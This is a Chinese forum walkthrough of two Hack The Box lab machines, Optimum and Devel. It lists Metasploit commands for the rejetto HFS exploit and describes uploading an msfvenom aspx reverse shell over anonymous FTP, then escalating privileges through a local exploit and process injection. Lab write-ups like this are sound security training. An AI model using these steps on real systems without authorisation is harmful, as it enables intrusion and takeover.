目录:
0x00:靶机介绍
0x01:探测靶机
0x02:利用MSFgetshell
0x03:提权
0x04:第二个靶机
0x05:探测靶机
0x06:探访21端口
0x07:制作反弹shell
0x08:提权
第一个靶机是Optimum难度还比较简单可以全程MSF操作
首先还是是用autorecon进行探测使用方法比较简单加个IP就行了。当出现full tcp finished的时候就可以去查看了
还是一如既往的只开了80端口。提取其中的关键字HttpFileServer 版本为2.3
emmmm由于人在中国,不可能加载的了google的ajax卒只能放弃回去提取关键字到MSF搜一下
进入MSF输入全称没有。。。。而输入简写就有配合刚才得知的版本有现成的payload可以使用
输入以下命令即可设置好
命令: use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set SRVHOST 10.10.14.35
set LHOST 10.10.14.35
set LPORT 4444(不能跟上面的SRVPORT重合)
来手run就会自动运行当出现meterepeter的时候就代表成功了
user的flag也在当前目录下
一开始我是想直接使用 local_exploit_suggester结果尝试到了第一次翻车,两个都用不了卒
只能把systeminfo下到本地然后根据里面的版本信息去网上找。。。。
找了一轮后找到一个41020的漏洞。
然而MSF没有现成的只能打开浏览器下载到kali本地
回到MSF那里使用Upload功能把payload传上去。目前只是个普通用户
然后只需要运行就可以权限提升了。
这次的靶机是Devel,难点在于后期提权
首先还是先使用autorecon扫描波,当出现nmap-full-tcp完成的时候其实就可以停止了。也可以等它联动完gobuster扫描
这里我直接打开旁边的result查看,开了波21端口支持匿名登录。同时扫出了里面的内容。还有一个80端口
先输入波IP可以正常访问
这里正常登录输入Anonymous作为用户名,然后密码为空以后成功登录。浏览了波aspnet_client以后没挖掘到其它的信息。
不过发现80端口的文件似乎于21端口里面的文件一样。都可以访问。
如果21端口放置的是80端口WEB内容的话理论上来讲,我们可以上传波反弹shell。这里先测试一下,现在本地创建个1.txt,里面包含hello world
然后在21端口上用put把文件上传上去
在前端可以访问开始制作反弹shell
一开始比较头铁,直接传PHP反弹马上去结果403了。后来想一想在21端口上有个asp_client那应该是个asp的站来着应该做asp的马,这里利用msfvenom生成一个aspx的马顺便填好本地IP和要开放的端口
然后这里为了后面方便的操作。我还是决定用MSF来做。启动exploit/multi/handler模块。设置好刚才用的payload及IP和端口信息
重回ftp端口,把aspx的马放上去
前端访问10.10.10.5/makabaka.aspx。当出现meterpreter的时候就代表成功了,同时用getuid发现目前权限还比较低
然后可以运行波 post/multi/recon/local_exploit_suggester来查看波本地漏洞有哪些。然而真正的折磨来了。。。。。。,这里只是简单的概括一下方法
这里如果想用提权payload的话得先用background退回去。然后选择你想要的payload(注:如果不想麻烦的调各种设置的话建议用这个)设置好session n,直接exploit就行了。这里不用担心失败
然后我们回到上个session,即得到反弹shell的session,启动波ps(查看进程),发现448进程多了点东西,来波进程注入偷渡到那里
再次进入shell模式以后输入whoami/getuid已经成功提权成功
后面就是拿flag了。
最后打波小广告欢迎大家关注我们的公众号神隐攻防实验室
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
奖励系统 | 100.00 | 0 | 2020-12-15 08:08:45 | 投稿满 10 赞奖励 |
奖励系统 | 50.00 | 0 | 2020-12-14 19:07:09 | 投稿满 5 赞奖励 |
veek | 150.00 | 0 | 2020-12-09 10:10:28 | 期待更多干货~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.